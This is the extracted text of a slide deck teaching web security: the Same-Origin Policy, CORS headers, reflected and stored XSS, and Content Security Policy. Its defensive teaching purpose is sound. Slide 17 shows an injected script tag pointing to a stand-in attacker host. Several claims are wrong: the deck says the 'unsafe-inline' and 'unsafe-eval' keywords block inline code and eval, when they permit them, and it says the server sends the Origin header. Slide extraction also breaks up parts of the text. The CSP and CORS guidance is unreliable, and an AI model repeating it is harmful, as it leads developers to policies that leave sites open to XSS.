  • 5. What are allowed in SOP? • SOP cannot prevent cross site content inclusions (like images, scripts, css from different domain • http://www.google.com/page1 can access http://www.google.com/page2 • http://www.google.com/page1 cannot access http://www.yahoo.com as the two pages belong to different domain • <script> is allowed by SOP [file:// ??] • In a http://www.mypage.com page, you can include<script src= http://api.google.com/googleplus >. • Google API page scripts are executed in “Mypage” domain, HTML Application, it will still have access to “Mypage” DOM elements. So, if the “Google API scripts” are compromised, it will have bad effect on the “MyPage” (Will take it to XSS- Cross Site Scripting)
  • 6. What is not allowed in SOP? • AJAX (XHR) from One domain to another • XHR request from “MyPage.com” to “Google.com” • Why it is not allowed? – Using AJAX you can download a malicious JS code and could spoil the current page information or could derive information from current page and send it over maliciously to remote pages
  • 7. How to circumvent SOP • • • • Simple suggestion DO NOT USE ( unless it’s the End of the World) Document.domain PostMessage JSONP • Right Way – CORS (Cross-Origin Resource Sharing)
  • 8. Cross-Origin Resource Sharing • CORS is to overcome SOP for XHR • Allowing Cross Origin Request from Domain A to Domain B using XHR • Introduction of new HTTP Headers (Origin) from Server to make Browser decide to Allow Cross-Origin request or not • Use Pre-flight (handshake) OPTIONS request for methods other than POST/GET to know if the server supports, allow-origin for your request More Detail
  • 10. CORS HTTP Request/Response Headers HTTP Request/ ResponseHeader Parameter Description Example Access-Control-AllowOrigin: <origin> | * Specifying a particular “domain” is allowed or “*” all Access-Control-AllowOrigin: http://mozilla.com Access-Control-AllowCredentials True| false Request for cookie along with request Access-ControlRequest-Method GET,POST Request for supported HTTP methods Access-Control-AllowHeaders Content-Type| Custom-Header Preflight-request headers
  • 11. CORS Server/Browser Request /Response Flow http://www.html5rocks.com/static/images/cors_server_flowchart.png
  • 12. XSS (Cross Site Scripting) • Finding Vulnerability of Web Pages and injecting and injecting malicious client side- script . • Types – Non-Persistent (server Echo’s back your request) – Adding malicious scripts in HTML Forms, HTTP Query from web browser during a search request. If the “String” is not formatted/escaped, the injected script will be executed back in client browser. – E.g., • Phishing Attacks, • URL Shortens (bit.ly ) taking to legitimate page and injecting their “script” along with it
  • 13. XSS (Cross Site Scripting) – Persistent (Server stores the data and script) – Storing user provided “string” as is without escaping the HTML, JS code in Webserver and serving later to all users will cause the malicious script to execute on client browser – Message Boards, which include Plain Text and Scripts, later when another user reloads the Message Board, the malicious code executes and steals user data – Defacing web servers, cookie/session stealing
  • 14. Examples • http://www.insecurelabs.org/Task/Rule1 • http://www.insecurelabs.org • https://www.owasp.org/index.php/Testing_for_Reflected_Cros s_site_scripting_(OWASP-DV-001)
  • 15. How to Prevent XSS • • • • • Validation/Sanitization of ALL user inputs in a page No inline please, keep it safe in a dedicated JS Secure all input path, query string, file path etc Don’t keep untrusted data in your HTML, JS This is one of the reason, you find forms in organization preventing <, > etc  • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Pre vention_Cheat_Sheet • And of course CSP (Content Security Policy)
  • 16. Content Security Policy (CSP) • It’s a policy how Browser/UserAgent adhere to as a directive from HTTP Server in order to display, execute scripts • New HTTP Headers introduced to enable CSP • Content-Security-Policy: script-src 'self' Trusted Source https://abc.MyWebpage.com Resource Trusted Source
  • 17. Content Security Policy • If a malicious code is injected through XSS (added <script src=“hackedsite.com”>), browser will detect and prevent • More XSS prevention by • 'unsafe-inline' prevents inline JavaScript and CSS • 'unsafe-eval' prevents text-to-JavaScript mechanisms like eval • Default-src “none” (Shut down any other script, img, media load beyond my own) • Other resources which can be controlled by CSP are font-src,img-src etc – – – – http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://erlend.oftedal.no/blog/csp/readiness/ http://people.mozilla.org/~bsterne/content-security-policy/details.html https://wiki.mozilla.org/index.php?title=Security/CSP/Spec&oldid=133465